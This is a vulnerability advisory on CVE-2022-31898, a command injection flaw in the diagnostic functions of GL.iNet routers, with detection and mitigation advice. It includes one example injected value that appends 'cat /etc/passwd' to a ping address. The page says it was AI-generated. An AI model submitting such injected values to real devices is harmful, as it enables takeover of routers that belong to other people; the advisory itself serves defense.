CVE-2022-31898 Overview
CVE-2022-31898 is a command injection vulnerability affecting GL.iNet travel routers, specifically the GL-MT300N-V2 Mango and GL-AX1800 Flint models. Multiple command injection flaws were discovered in the ping_addr and trace_addr function parameters, allowing authenticated attackers with administrative privileges on an adjacent network to execute arbitrary operating system commands on the affected devices.
Critical Impact
Authenticated attackers with high privileges on an adjacent network can achieve complete system compromise through arbitrary command execution, potentially leading to full device takeover, network pivoting, and persistent backdoor installation.
Affected Products
- GL.iNet GL-MT300N-V2 (Mango) firmware version 3.212
- GL.iNet GL-AX1800 (Flint) firmware version 3.214
- GL.iNet GL-MT300N-V2 hardware device
- GL.iNet GL-AX1800 hardware device
Discovery Timeline
- 2022-10-27 - CVE-2022-31898 published to NVD
- 2025-05-07 - Last updated in NVD database
Technical Details for CVE-2022-31898
Vulnerability Analysis
This vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command), commonly known as OS command injection. The affected GL.iNet routers fail to properly sanitize user-supplied input within the diagnostic functionality of the router's administrative interface. When an authenticated administrator initiates network diagnostic operations such as ping or traceroute, the ping_addr and trace_addr parameters are passed directly to underlying shell commands without adequate input validation or sanitization.
The attack requires the adversary to be on an adjacent network and possess high-level administrative credentials to the router's web interface. Despite these access requirements, successful exploitation grants the attacker the ability to execute arbitrary commands with the privileges of the web server process, typically root on embedded Linux systems like these routers.
Root Cause
The root cause of this vulnerability lies in the improper handling of user input in the network diagnostic functions. The router's firmware directly incorporates user-controlled values from the ping_addr and trace_addr parameters into shell command strings without proper sanitization, escaping, or validation. This allows specially crafted input containing shell metacharacters or command separators to break out of the intended command context and execute attacker-supplied commands.
Attack Vector
The attack vector requires adjacent network access combined with administrative credentials. An attacker must first authenticate to the router's administrative interface, then navigate to the network diagnostic functionality. By injecting shell metacharacters such as semicolons (;), pipes (|), backticks (`), or command substitution syntax ($(...)) into the ping address or trace address input fields, the attacker can append or substitute arbitrary commands that will be executed by the underlying operating system.
For example, an attacker could submit a crafted address like 127.0.0.1; cat /etc/passwd to the ping function, causing the router to execute both the legitimate ping command and the injected command to read the system password file. More sophisticated payloads could establish reverse shells, download additional malware, modify firewall rules, or create persistent backdoors.
Technical analysis and further details are available in the Boschko Analysis of GL.iNet Router.
Detection Methods for CVE-2022-31898
Indicators of Compromise
- Unusual outbound network connections from the router to external IP addresses or command-and-control servers
- Unexpected processes running on the router device, particularly shells spawned by the web server process
- Modified firmware files or configuration changes not initiated by legitimate administrators
- Authentication logs showing administrative access from unexpected adjacent network devices
Detection Strategies
- Monitor router administrative interface logs for suspicious input patterns in diagnostic functions containing shell metacharacters
- Implement network traffic analysis to detect anomalous traffic originating from router management interfaces
- Deploy intrusion detection rules to identify command injection patterns in HTTP requests to router administrative endpoints
- Review router configurations periodically for unauthorized changes or new user accounts
Monitoring Recommendations
- Enable comprehensive logging on GL.iNet router devices and forward logs to a centralized SIEM solution
- Implement network segmentation to limit adjacent network access to router management interfaces
- Monitor for firmware integrity changes using hash verification against known-good firmware images
- Set up alerts for administrative login attempts from unusual network segments
How to Mitigate CVE-2022-31898
Immediate Actions Required
- Update GL.iNet GL-MT300N-V2 (Mango) firmware to a version newer than 3.212
- Update GL.iNet GL-AX1800 (Flint) firmware to a version newer than 3.214
- Restrict administrative interface access to trusted networks and devices only
- Implement strong, unique administrative credentials and enable multi-factor authentication if available
- Audit administrative access logs for any signs of compromise
Patch Information
GL.iNet users should check the official GL.iNet support website for firmware updates that address this vulnerability. Ensure that firmware versions installed are more recent than the affected versions (3.212 for GL-MT300N-V2 and 3.214 for GL-AX1800). The Boschko Analysis of GL.iNet Router provides additional context on the vulnerability.
Workarounds
- Disable or restrict access to the network diagnostic functions (ping and traceroute) in the administrative interface until patched firmware is available
- Implement network access controls to limit which devices can reach the router's administrative interface
- Use firewall rules to block administrative access from untrusted adjacent network segments
- Consider deploying a separate management VLAN with strict access controls for router administration
# Example: Restrict management interface access via firewall rules
# Block administrative interface access from untrusted networks
iptables -A INPUT -p tcp --dport 80 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
